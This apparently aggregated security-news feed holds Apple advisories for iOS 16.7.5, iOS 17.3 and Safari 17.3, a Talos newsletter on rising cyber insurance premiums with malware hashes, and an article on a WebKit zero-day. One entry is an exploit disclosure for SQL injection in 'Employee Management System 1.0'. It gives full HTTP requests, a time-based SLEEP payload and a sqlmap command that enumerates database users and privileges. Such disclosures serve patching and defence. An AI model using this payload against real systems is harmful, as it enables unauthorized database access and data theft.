Apple Security Advisory 01-22-2024-3 - iOS 16.7.5 and iPadOS 16.7.5 addresses code execution vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-01-22-2024-3 iOS 16.7.5 and iPadOS 16.7.5iOS 16.7.5 and iPadOS 16.7.5 addresses the following issues.Information about the security content is also available athttps://support.apple.com/kb/HT214063.Apple maintains a Security Updates page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.AccessibilityAvailable for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generationImpact: An app may be able to access sensitive user dataDescription: A privacy issue was addressed with improved private dataredaction for log entries.CVE-2023-42937: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)Apple Neural EngineAvailable for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generationImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2024-23212: Ye Zhang of Baidu SecuritycurlAvailable for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generationImpact: Multiple issues in curlDescription: Multiple issues were addressed by updating to curl version8.4.0.CVE-2023-38545CVE-2023-38039CVE-2023-38546CVE-2023-42915ImageIOAvailable for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generationImpact: Processing a maliciously crafted image may result in disclosureof process memoryDescription: The issue was addressed with improved checks.CVE-2023-42888: Michael DePlante (@izobashi) of Trend Micro Zero DayInitiativeSafariAvailable for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generationImpact: A user's private browsing activity may be visible in SettingsDescription: A privacy issue was addressed with improved handling ofuser preferences.CVE-2024-23211: Mark BowersWebKitAvailable for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generationImpact: Processing web content may lead to arbitrary code executionDescription: The issue was addressed with improved memory handling.WebKit Bugzilla: 266619CVE-2024-23213: Wangtaiyu of Zhongfu infoWebKitAvailable for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generationImpact: Processing maliciously crafted web content may lead to arbitrarycode executionDescription: Multiple memory corruption issues were addressed withimproved memory handling.WebKit Bugzilla: 265129CVE-2024-23214: Nan Wang (@eternalsakura13) of 360 VulnerabilityResearch InstituteWebKitAvailable for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generationImpact: A maliciously crafted webpage may be able to fingerprint theuserDescription: An access issue was addressed with improved accessrestrictions.WebKit Bugzilla: 262699CVE-2024-23206: an anonymous researcherWebKitAvailable for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generationImpact: Processing maliciously crafted web content may lead to arbitrarycode execution. Apple is aware of a report that this issue may have beenexploited.Description: A type confusion issue was addressed with improved checks.WebKit Bugzilla: 267134CVE-2024-23222This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 16.7.5 and iPadOS 16.7.5".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDacACgkQX+5d1TXaIvpgXxAAvQ8KvvppTOQ/4HsWUyKkJyubBU+8sgfM/tKBbk/Lb2ABMGhzb/Ln68Bg2GB23kOI5y0X6Gy9IZqAl8TY71baaxrgZQrz0uXMfdgzA1Gcf3mAP/mGyDYcKy2pBMwnuJQbO0dzZCcm0P069WDBW6jDwBJwzZ3f50LUCH8CgqNgdZ+ey+hMLfDEbamTtySwDXxL3ORgFoDY1X4ysxUlPGRqZhQ0vwWQ0cvcDFJyrP+Xy76V5XhP8/zEiAUmlzf6jVWjJq3DkkTKw1CamM5tvyc5Jm7tagOFZPaLi2k5no8YtjU7kKxXjTpsg+itT0p5yNJeCtKP6fZdRryT+t9tGUk0QjFjin8WUO0otqn3v+MI/ezn4YM8ioCzL5YcN6rvm+9ta4Q5C5h9UoVF1KsM9Zs/e6f8nfF8aWRcrMTCR83TUhBoviSuWyvfxo5iDbNDws+ijuBKqEYHRrBnGMZSyyzFzfl5Nlf9HeEyslpJ0Jt0ta1i9IyYNlDotKo3wDcvDQc3lIM4oeW/A3qt0lDqwfhz1M5Kf6I5LqY6YE5fCGg8YOBqSVtvH39BwDzT2yVmJHeX6CpFEkR4tsGYN4HTKoo50SVQeAtPh4iaG4qLes2T5b/T18hEjaSfVsJOL4vHPIQiU1DqfQa5Fjn/HVUljPZPL5A+OsjYcs8z9nPbySIlWyE==9qeR-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-3

Apple Security Advisory 01-22-2024-2 - iOS 17.3 and iPadOS 17.3 addresses bypass and code execution vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3iOS 17.3 and iPadOS 17.3 addresses the following issues.Information about the security content is also available athttps://support.apple.com/kb/HT214059.Apple maintains a Security Updates page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.Apple Neural EngineAvailable for devices with Apple Neural Engine: iPhone XS and later,iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 8thgeneration and later, and iPad mini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2024-23212: Ye Zhang of Baidu SecurityCoreCryptoAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5ciphertexts without having the private keyDescription: A timing side-channel issue was addressed with improvementsto constant-time computation in cryptographic functions.CVE-2024-23218: Clemens LangKernelAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2024-23208: fmyy(@binary_fmyy) and lime From TIANGONG Team ofLegendsec at QI-ANXIN GroupMail SearchAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to access sensitive user dataDescription: This issue was addressed with improved redaction ofsensitive information.CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), andIan de MarcellusNSSpellCheckerAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to access sensitive user dataDescription: A privacy issue was addressed with improved handling offiles.CVE-2024-23223: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)Reset ServicesAvailable for: iPhone XS and laterImpact: Stolen Device Protection may be unexpectedly disabledDescription: The issue was addressed with improved authentication.CVE-2024-23219: Peter Watthey and Christian ScaleseSafariAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: A user's private browsing activity may be visible in SettingsDescription: A privacy issue was addressed with improved handling ofuser preferences.CVE-2024-23211: Mark BowersShortcutsAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: A shortcut may be able to use sensitive data with certainactions without prompting the userDescription: The issue was addressed with additional permissions checks.CVE-2024-23203: an anonymous researcherCVE-2024-23204: Jubaer Alnazi (@h33tjubaer)ShortcutsAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to bypass certain Privacy preferencesDescription: A privacy issue was addressed with improved handling oftemporary files.CVE-2024-23217: Kirin (@Pwnrin)TCCAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to access user-sensitive dataDescription: An issue was addressed with improved handling of temporaryfiles.CVE-2024-23215: Zhongquan Li (@Guluisacat)Time ZoneAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to view a user's phone number in system logsDescription: This issue was addressed with improved redaction ofsensitive information.CVE-2024-23210: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)WebKitAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: A maliciously crafted webpage may be able to fingerprint theuserDescription: An access issue was addressed with improved accessrestrictions.WebKit Bugzilla: 262699CVE-2024-23206: an anonymous researcherWebKitAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing web content may lead to arbitrary code executionDescription: The issue was addressed with improved memory handling.WebKit Bugzilla: 266619CVE-2024-23213: Wangtaiyu of Zhongfu infoWebKitAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing maliciously crafted web content may lead to arbitrarycode executionDescription: Multiple memory corruption issues were addressed withimproved memory handling.WebKit Bugzilla: 265129CVE-2024-23214: Nan Wang (@eternalsakura13) of 360 VulnerabilityResearch InstituteWebKitAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing maliciously crafted web content may lead to arbitrarycode execution. Apple is aware of a report that this issue may have beenexploited.Description: A type confusion issue was addressed with improved checks.WebKit Bugzilla: 267134CVE-2024-23222This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 17.3 and iPadOS 17.3".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDP8ACgkQX+5d1TXaIvp1NA//Ziu4pKJd/OIbEjiPfVw8w/q2A4uPkHzOtxWWeSsuQHmUjULi9PGLtjFdOy6SGjIAXKkP5wpt2qoOXcqEwP8kQzMQZwmRSHyPbSNXLyDiThgLdFWOqV5GcO1+eM7vOvKfcf7ITJJashPS4gJet7QpqX0vM5Pop9XJlS679IdhnauCY/ocmoWafvayY7IZf6SXYXh/V6wWk76zW7ZAgdWz0qxPjoObc3UrggJagBuBGzbSbEj1aK+tw8GMKw0whSG1fMqoLWsIielGaAahHmyIrg424S3HK/JdAXU8QXKKUc3HYVyShceLIgf7Gn/RFtIFiqoAlublgbEXthPYVG+pwFMvjUiCFPZK4tQ9yDtst+6ViPT+LK8Ea21ZqwvWTYqcFzKVbc+DcA4W0sLZE9Rc3tMXm60qoy5x1T4tIOFGSotrjH0M8CthxaxSMxRusr4ejiczr5dbeq/4pjU5PevU/kZVIp0lA65WkznSqio/UxpJ9uD2Oh2C8ZKOHE/az3I3zD7Tll52RPWA201fvo9Q3bCL5JRd/ayXN+tVRuyACkLPcDgPMNB8TdjoBrzFvJ8KRg9XHn9qJSsz/h15UJ/lwVOKBHmSP3H+VWBR/ts0oKcj+UQGmNSHtWNXvreC6ZbQi16JSK2wp0MvVWbFrWnwg0Ory4e5x5hHbrBEvvw0Qwk==kOJs-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-2

Apple Security Advisory 01-22-2024-1 - Safari 17.3 addresses code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-01-22-2024-1 Safari 17.3

Safari 17.3 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214056.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Safari  
Available for: macOS Monterey and macOS Ventura  
Impact: A user's private browsing activity may be visible in Settings  
Description: A privacy issue was addressed with improved handling of  
user preferences.  
CVE-2024-23211: Mark Bowers

WebKit  
Available for: macOS Monterey and macOS Ventura  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: An access issue was addressed with improved access  
restrictions.  
WebKit Bugzilla: 262699  
CVE-2024-23206: an anonymous researcher

WebKit  
Available for: macOS Monterey and macOS Ventura  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 266619  
CVE-2024-23213: Wangtaiyu of Zhongfu info

WebKit  
Available for: macOS Monterey and macOS Ventura  
Impact: Processing maliciously crafted web content may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
exploited.  
Description: A type confusion issue was addressed with improved checks.  
WebKit Bugzilla: 267134  
CVE-2024-23222

Safari 17.3 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDK4ACgkQX+5d1TXa  
IvpsdQ/+LRXsqQK9ZIXoBoXhj0w15DUKVrVfQr/jauI3pgxBZcuZeYiM0SyNnROH  
SXppIL9KGUaOxDm+RqggN4rVB/PFPBTfZ7NB42odpnyxswVe7ozTir09BaYGnwoo  
o+S2I8IN6Nn7ePV5wTXjmftUjNetk6J5iGQ4KboVPTPsNOuw+3r/nohjrYt2ERgq  
YFVAsBK0gOQwY1chnNxOqFghWtZCkYKIinYCc89KcYVwZ6WpFaQlqk++E1p1vd1C  
l4teK1uJv7thLkpneq9e3alb1qQCfX5XLpHX596uNrs0HXJYESQgwZgHmMqsssJa  
LOCTahxE39Oevjy9q5z+UzaIBK2SAULgmaMdnrRLDV8641hDsjVuYyCzVs5jMNOa  
+ty80EmEUiwcR/yuzbAmOgmdvuVuowdkGWR9pdhTWM9Co7PMdTRZLUiOsi4qUUPT  
HxqJ42o53gNWzJhINTyufVRDd2VTcOH8X+C/uEbwMF/LHO4scNnI/0n1SrRsUCKg  
msV7r3VheTGylX3KV/ivZiJq8agjheh/awRDQ1/1Lyd7yGb8tZSdP0iFrCgayB9d  
RgrVR7yyXd/SCQsjI2hGRzTMoTQhARsx78dXtf2LFxONZZOFIaYnupzLxHeX58kp  
lcN/OmgEb9w0t+/M9Lwn4kdvTZ/rbfF5+1BAI9VTuuAt9N+0fyk=  
=jmbL  
-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-1

Cyber insurance premiums are expected to rise this year after leveling out in 2023.

Thursday, January 25, 2024 14:00

I just bought an electric car last week, so I’ve been shopping for new car insurance policies that could offer me a discount for ditching gas. 

We’re all familiar with the boring process of entering the same information 10 times over into 10 different companies’ websites trying to see who comes out the cheapest and offers the best bundles, discounts or deals. 

Unfortunately, with cybersecurity insurance, there are no bundles or “Personal Price Plans” to enroll in, and costs are rising. 

This is nothing to say about whether an organization should get cyber insurance. That is 100 percent their decision to make, and every case is going to be different. But for companies who are interested in getting these types of policies to be best prepared to recover from and deal with a potential security incident, it’s now more expensive than ever to get cyber insurance. 

A report last week from Dark Reading indicated that cyber insurance costs are expected to rise over the next 12 to 24 months. This would be after premiums for these plans rose 50 percent in 2022, according to Bloomberg, though they largely held steady in 2023. 

This problem isn’t isolated to just the U.S., either. A November report from business continuity service Databarracks surveyed companies in the U.K. and found that nearly a third of respondents said their cyber insurance had increased in cost over the past year, while more companies than ever said they had any type of cyber insurance policy, implying a totally new line item for their budgets. 

This rising cost could certainly be attributed to all the classic factors of why anything gets more expensive: market demand, inflation, rising costs of doing business, etc. But an increase in ransomware activity seems to be a large driver, too. 

The same Databarracks survey found that 24 percent of all IT downtime for respondents was due to a cyber incident, up 14 percent from 2018. Thirty-seven percent of all companies said they experienced a ransomware attack in 2023, and more than half experienced some sort of security incident in general. 

As we saw in our most recent Talos Incident Response Quarterly Trends Report, ransomware may rise again after a relatively quiet period from mid-2022 through the summer of 2023. Ransomware, including pre-ransomware activity, was the top observed threat in the fourth quarter of 2023, accounting for 28 percent of engagements, according to Talos IR, a 17 percent increase from the previous quarter. 

That’s not to say that it’s a lock that ransomware attacks are going to be up in 2024, but if they are, cyber insurance policies are only going to get more expensive, which means further shifting budgets for companies of all sizes.  

There is no one-size-fits-all approach for how anyone should approach getting a cybersecurity insurance policy. Still, if companies can’t steady the cost of premiums, it may send executives shopping for other, potentially less effective, methods of preparing for a cyber attack. 

**The one big thing **

Cisco Talos Incident Response (Talos IR) saw a significant increase in ransomware activity in its engagements during the fourth quarter of 2023, while education remains one of the most targeted sectors. Talos IR also observed several brand new ransomware operations for the first time in Q4, including Play, Cactus, BlackSuit and NoEscape. The latest Talos IR Quarterly Trends Report has a full breakdown of the top threats they saw in the wild and an idea of where attacker tactics might be headed in 2024. 

**Why do I care? **

This was the first time in all of 2023 that the rate of ransomware attacks rose during IR engagements. Education and manufacturing were tied for the most targeted verticals, accounting for nearly 50 percent of the total number of incident response engagements, so those industries should note Talos IR’s findings. 

**So now what? **

The lack of MFA remains one of the biggest impediments to enterprise security and led to many of the attacks Talos IR saw in Q4. All organizations should implement some form of MFA, such as Cisco Duo. 

**Top security headlines of the week **

**One of the largest password dumps ever was posted last week to an online forum, seemingly containing more than 25 million login credentials that had never been leaked before.** In all, the collection includes 71 million unique credentials for a range of websites, including the online video game “Roblox,” Yahoo, Facebook and eBay. Though many of these credentials had already been leaked in the past, the user hosting the file claims they all came through an information-stealing malware that collected the usernames and passwords in plain text. Credentials that are stolen via data breaches often contain encrypted passwords. The operator behind the website Have I Been Pwned? first discovered the trove of data earlier this month, but it’s likely been in circulation in various online forums for at least four months. Each line in the dataset, which consists of images and plain text, includes a login URL, the associated account’s name and a password. (Ars Technica, Bleeping Computer) 

**A new report indicates that each Facebook user could be sharing their personal data with thousands of other companies.** The study, conducted by the non-profit Consumer Report, followed more than 700 volunteers’ Facebook accounts and found that, on average, each participant in the study had their data sent to Facebook by 2,230 companies. Some respondents had their data shared with more than 7,000 different companies, and in all, the study captured more than 180,000 organizations that shared data with Facebook. The study was specifically meant to capture “server-to-server” tracking, in which personal data goes from a company’s servers to Meta’s, the parent company of Facebook, servers. The more “traditional” form of tracking for Meta through pixels on other companies’ websites can easily be spotted in a web browser, while server-to-server cannot. The three companies that appeared the most often connected to participants’ accounts in the study were all data brokers, who presumably turned around and sold that data to additional companies for a profit. Consumer Reports listed multiple recommendations for Facebook to improve its data protection, including improving the transparency of Facebook’s data collection tools, making it easier for users to opt out of data sharing and asking the U.S. government to pass data minimization laws. (Consumer Reports, The Markup) 

**Apple released a series of security updates this week for its devices that fixed three vulnerabilities in the WebKit browser engine** that were already being exploited in the wild. One of the vulnerabilities, CVE-2024-23222, is believed to have been exploited in more recent versions of Apple’s mobile operating system iOS. An attacker could exploit this vulnerability to execute remote code on the targeted device. Two other vulnerabilities, CVE-2023-42916 and CVE-2023-42917, were likely exploited in version of iOS dating back to before 16.7.1. The U.S. Cybersecurity and Infrastructure Security Agency added CVE-2024-23222 to its Known Exploited Vulnerabilities (KEV) list. Apple released patches for all its devices, including the Apple TV streaming box, iPad and macOS desktop computers. (SecurityWeek, Computer Weekly) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #169: What's new with CVSS 4.0, and does it really change anything? 
*   Best Practices for Handling Incident Response During a Merger and Acquisition 
*   Cisco Tech Beat Podcast: Talking Past, Current, and Future Cyber Threats with Nick Biasini 
*   Critical vulnerability in ManageEngine could lead to file creation, dozens of other vulnerabilities disclosed by Talos to start 2024 
*   Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** e340aa9f08ce8128e17a3186053bfaf2dc119d98a64f7bc4d37fb7be03365c93   
**MD5:** 5800fc229e3a5f13b32d575fe91b8512   
**Typical Filename:** client32.exe   
**Claimed Product:** NetSupport Remote Control   
**Detection Name:** W32.Riskware:Variant.27dv.1201 

**SHA 256:** 1fa0222e5ae2b891fa9c2dad1f63a9b26901d825dc6d6b9dcc6258a985f4f9ab   
**MD5:** 4c648967aeac81b18b53a3cb357120f4   
**Typical Filename:** yypnexwqivdpvdeakbmmd.exe   
**Claimed Product:** N/A    
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** 581866eb9d50265b80bae4c49b04f033e2019797131e7697ca81ae267d1b4971   
**MD5:** 4c5fdfd4868ac91db8be52a9955649af   
**Typical Filename:** N/A   
**Claimed Product:** N/A   
**Detection Name:** W32.581866EB9D-100.SBX.TG 

**SHA 256:** 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440   
**MD5:** ef6ff172bf3e480f1d633a6c53f7a35e   
**Typical Filename:** iizbpyilb.bat   
**Claimed Product:** N/A    
**Detection Name:** Trojan.Agent.DDOH 

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a   
**MD5:** 200206279107f4a2bb1832e3fcd7d64c   
**Typical Filename:** lsgkozfm.bat   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::tpd

Why is the cost of cyber insurance rising?

Employee Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Employee Management System  - SQLi# Date: 23/03/2024# Exploit Author: Özlem Balcı# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/php/16999/employee-management-system.html# Software Download:https://www.sourcecodester.com/download-code?nid=16999&title=Employee+Management+System+using+PHP+and+MySQL# Version: 1.0# Tested on: Mac OS## DescriptionA Time-Based Blind SQL injection vulnerability in the login page(/employee_akpoly/Account/login.php) in Employee Management System allowsremote unauthenticated attackers to execute remote command througharbitrary SQL commands by "txtemail" parameter## Request PoCPOST /employee_akpoly/Account/login.php HTTP/1.1Host: localhostContent-Length: 55Cache-Control: max-age=0sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "macOS"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/employee_akpoly/Account/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: PHPSESSID=1af7jipa5jq7ak8ifd09bgtokfConnection: closetxtemail=test%40test.com&txtpassword=12345A&E&btnlogin=This request causes an error. Adding ' AND (SELECT 2092 FROM(SELECT(SLEEP(11)))DZSD) AND 'yLcd'='yLcd&txtpassword=123456AE to the endof "txtemail" parameter, the response to request was 302 status code withmessage of Found, but 11 seconds later, which indicates that our sleep 11command works.POST /employee_akpoly/Account/login.php HTTP/1.1Host: localhostContent-Length: 117Cache-Control: max-age=0sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "macOS"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/employee_akpoly/Account/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: PHPSESSID=1af7jipa5jq7ak8ifd09bgtokfConnection: closetxtemail=test@test.com' AND (SELECT 2092 FROM (SELECT(SLEEP(11)))DZSD) AND'yLcd'='yLcd&txtpassword=123456AE&btnloginsqlmap -r emp.txt --risk=3 --level=3 --dbms=mysql --is-dba --users--privileges --roleParameter: txtemail (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: txtemail=test@test.com' AND (SELECT 2092 FROM(SELECT(SLEEP(5)))DZSD) AND 'yLcd'='yLcd&txtpassword=123456AE&btnlogin=[image:Employee Management System 1.png][image: Employee Management System2.png]

Employee Management System 1.0 SQL Injection

Apple has released new security updates for several products including a patch for a zero-day vulnerability which may have been exploited.

Apple has released new security updates for several products, including a patch for a zero-day vulnerability that could impact iPhones, iPad, Macs, and Apple TVs.

Apple says it’s aware of a report that the bug may have been exploited already. Further details about the nature of the vulnerability were not disclosed to give users enough time to install the updates.

The updates may already have reached you if you automatically update, but it doesn’t hurt to check you’re on the latest version.

If a Safari update is available for your device, you can get it by updating your iPhone or iPad or updating your Mac.

Updates are available for:

Safari 17.3

macOS Monterey and macOS Ventura

iOS 17.3 and iPadOS 17.3

iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

iOS 16.7.5 and iPadOS 16.7.5

iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation, iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation

iOS 15.8.1 and iPadOS 15.8.1

iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

macOS Sonoma 14.3

macOS Sonoma

macOS Ventura 13.6.4

macOS Ventura

macOS Monterey 12.7.3

macOS Monterey

watchOS 10.3

Apple Watch Series 4 and later

tvOS 17.3

Apple TV HD and Apple TV 4K (all models)

**Technical details**

The zero-day vulnerability is listed as CVE-2024-23222: a type confusion issue in WebKit that was addressed with improved checks. This issue is fixed in tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3. Processing maliciously crafted web content may lead to arbitrary code execution.

Type confusion can occur in interpreted languages such as JavaScript and PHP, which use dynamic typing. In dynamic typing, the type of a variable is determined and updated at runtime, as opposed to being set at compile-time in a statically typed language. A type confusion vulnerability means an attacker has the opportunity to change the type of a given variable in order to trigger unintended behavior.

Several other vulnerabilities in WebKit, which is the browser engine that powers Safari and other apps, were patched as well.

**CISA**

